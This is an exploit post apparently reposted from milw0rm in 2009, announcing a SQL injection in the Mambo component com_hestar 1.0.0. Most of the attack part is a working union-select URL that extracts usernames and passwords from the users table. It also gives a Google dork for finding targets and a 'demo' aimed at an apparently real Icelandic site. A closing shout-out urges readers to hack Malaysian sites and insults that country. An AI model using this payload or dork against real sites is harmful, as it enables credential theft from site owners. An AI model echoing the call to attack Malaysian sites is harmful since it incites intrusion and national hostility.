|    |    |    | Today: 15-Nov-2019 |

Mambo Component com_hestar Remote SQL Injection Vulnerability

September 10, 2009 | Posted in ExploitAlert

#############################################################################################################
## com_hestar 1.0.0 ##
## Author : M3NW5 (M3NW5[at]hackermail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 07, 2009 ##
## ------------------------------------------------------------------------------------------------------- ##
## _______ __ __ ______ __ ##
##|_ _|.-----..--| |.-----..-----..-----..-----.|__|.---.-..-----. | |.-----..--| |.-----..----.##
## _| |_ | || _ || _ || || -__||__ --|| || _ || | | ---|| _ || _ || -__|| _|##
##|_______||__|__||_____||_____||__|__||_____||_____||__||___._||__|__| |______||_____||_____||_____||__| ##
## ##
## ------------------------------------------------------------------------------------------------------- ##
#############################################################################################################

[ Software Information ]

[+] Software : com_hestar
[+] Version : 1.0.0
[+] Provider : Netvistun - netvistun@netvistun.is
[+] Web Provider : www.netvistun.is
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:"com_hestar"

#############################################################################################################
[ POC ]

http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--

[ Demo ]

http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#############################################################################################################

[ Greetings ]

[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom

[ SHOUT ]

STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!

[ Special to ]

Anggie Lestari Putri sulung dari keluarga bapak dodi dan ibu dini ^^ i lope yu pull...

# milw0rm.com [2009-09-09]

Taged in: component, hestar, injection, mambo, Remote, vulnerability